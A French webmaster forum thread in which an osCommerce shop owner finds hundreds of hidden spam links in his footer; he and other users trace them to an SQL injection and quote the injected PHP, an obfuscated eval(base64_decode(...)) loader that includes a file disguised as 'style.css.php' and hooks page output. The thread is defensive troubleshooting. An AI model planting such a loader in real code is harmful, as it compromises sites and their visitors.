Virus ? liens externes invisibles apparut dans mon footer ?

Consultez la formation au REFERENCEMENT naturel Google de WebRankInfo / Ranking Metrics

nairod60
Nouveau WRInaute
Nouveau WRInaute
 
Messages: 25
Inscription: 21 Mar 2010

Virus ? liens externes invisibles apparut dans mon footer ?

Message le Mer Avr 28, 2010 13:45

Bonjour
Regarder sur mon site http://www.auxstickers.com environ 500 liens sont apparut dans mon footer ils sont invisible, regarder dans la source de la page pour les voir. Ils pointes tous vers des sites ecommerce infectés tout comme moi par les mêmes liens externes ? j'ai du choper ce truc avec un soft de seo


UsagiYojimbo
WRInaute accro
WRInaute accro
 
Messages: 8583
Inscription: 23 Nov 2005

Re: Virus ? liens externes invisibles apparut dans mon footer ?

Message le Mer Avr 28, 2010 13:47

Ca ou tu t'es fait sniffer tes accès FTP (j'ai eu le cas sur le site d'un client dont le site s'est fait modifier de cette façon suite à la récupération de ses accès FTP).


Haroeris
WRInaute impliqué
WRInaute impliqué
 
Messages: 601
Inscription: 13 Avr 2010

Re: Virus ? liens externes invisibles apparut dans mon footer ?

Message le Mer Avr 28, 2010 14:05

bloques l'accès avec un htaccess pendant tes mises à jour, j'ai eu accès à des informations pendants quelques secondes. :wink:

nairod60
Nouveau WRInaute
Nouveau WRInaute
 
Messages: 25
Inscription: 21 Mar 2010

Re: Virus ? liens externes invisibles apparut dans mon footer ?

Message le Mer Avr 28, 2010 14:15

J'ai trouvé! En haut de toute mes pages j'avais cette ligne (coder) :
"<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9ob21lei4zMTMvYXV4c3RpY2svd3d3L2FkbWluL2luY2x1ZGVzL2xhbmd1YWdlcy9lbmdsaXNoL2ltYWdlcy9idXR0b25zL3N0eWxlLmNzcy5waHAnO2lmKGZpbGVfZXhpc3RzKCRHTE9CQUxTWydtZnNuJ10pKXtpbmNsdWRlX29uY2UoJEdMT0JBTFNbJ21mc24nXSk7aWYoZnVuY3Rpb25fZXhpc3RzKCdnbWwnKSYmZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcpKXtvYl9zdGFydCgnZGdvYmgnKTt9fX0=')); ?>"

Et les fichiers sources étaient cachés dans le dossier admin.

Plus d'info ici "http://forums.oscommerce.com/topic/345957-evalbase64-decode-hack/"

J'ai chopé ca avec un soft seo que j'ai installé hier, je retrouve le nom et je le poste.

Cordialement DOrian


raljx
WRInaute accro
WRInaute accro
 
Messages: 2823
Inscription: 10 Juil 2006

Re: Virus ? liens externes invisibles apparut dans mon footer ?

Message le Mer Avr 28, 2010 14:18

Code: Tout sélectionner
if(function_exists('ob_start')&&!isset($GLOBALS['mfsn'])){$GLOBALS['mfsn']='/homez.313/auxstick/www/admin/includes/languages/english/images/buttons/style.css.php';if(file_exists($GLOBALS['mfsn'])){include_once($GLOBALS['mfsn']);if(function_exists('gml')&&function_exists('dgobh')){ob_start('dgobh');}


UsagiYojimbo
WRInaute accro
WRInaute accro
 
Messages: 8583
Inscription: 23 Nov 2005

Re: Virus ? liens externes invisibles apparut dans mon footer ?

Message le Mer Avr 28, 2010 14:20

Je suis pas sûr que le soft SEO soit en cause. Il faut un soft capable de modifier les pages directement sur le serveur pour faire ça, et de traiter du php. Etant donné que tu utilise oscommerce, qui est connu pour ses failles plus que nombreuses, ça sent davantage l'injection SQL ou le détournement des accès FTP.

A ta place je changerais immédiatement mes identifiants FTP déjà.

nairod60
Nouveau WRInaute
Nouveau WRInaute
 
Messages: 25
Inscription: 21 Mar 2010

Re: Virus ? liens externes invisibles apparut dans mon footer ?

Message le Mer Avr 28, 2010 22:44

Tu avais raison c'était bien une injection.
Faille sur oscommerce rc2a pourtant bien connue (on en apprend tous les jours...).
J'ai passé toute mon après midi et soirée a effacer tous les morceaux de code injecté (tous codés, ce qui de ne facilite pas la tache...) reste plus qu'à boucher la faille!


UsagiYojimbo
WRInaute accro
WRInaute accro
 
Messages: 8583
Inscription: 23 Nov 2005

Re: Virus ? liens externes invisibles apparut dans mon footer ?

Message le Mer Avr 28, 2010 22:46

OsCommerce est franchement le script d'E-Commerce à proscrire, trop de trous de sécu dans tous les sens, et codé avec les pieds (même si à une époque ça ne l'empêchait pas de dominer le marché des scripts E-commerce).


Si vous avez aimé cette discussion, partagez-la sur vos réseaux sociaux préférés :

Formation recommandée sur ce thème :

Formation REFERENCEMENT naturel Google : apprenez une méthode efficace pour optimiser à fond le référencement naturel dans Google de façon durable... Formation animée par Olivier Duffez et Fabien Facériès, experts en référencement naturel.

Tous les détails sur le site Ranking Metrics : programme, prix, dates et lieux, inscription en ligne.

Lectures recommandées sur ce thème :

  • Echanger des liens
    Cet outil vous liste quelques sites qui font des liens vers des sites similaires au vôtre, pour vous aider à trouver des partenaires pour des échanges de liens.
  • Calculer le ratio de liens profonds
    Cet outil vous permet de calculer le taux de liens profonds vers un site web. Un lien profond est un lien qui ne pointe pas vers la page d'accueil mais au contraire vers une page interne du site. Les sites dont l'essentiel du référencement vient de leurs inscriptions dans des annuaires ont un taux de liens profonds faible ; à l'inverse, les sites de référence ont souvent un taux de liens profonds plus important, signe que leur contenu a suscité de nombreux liens spontanés.
  • Liste des backlinks
    Cet outil vous permet d'analyser en détails la "popularité" de votre site sur Google. En plus du nombre de liens pris en compte par Google, il calcule le pourcentage de liens internes parmi tous les liens, et il affiche les premières URL trouvées.


Qui est en ligne

Utilisateurs parcourant ce forum: Aucun utilisateur enregistré et 0 invités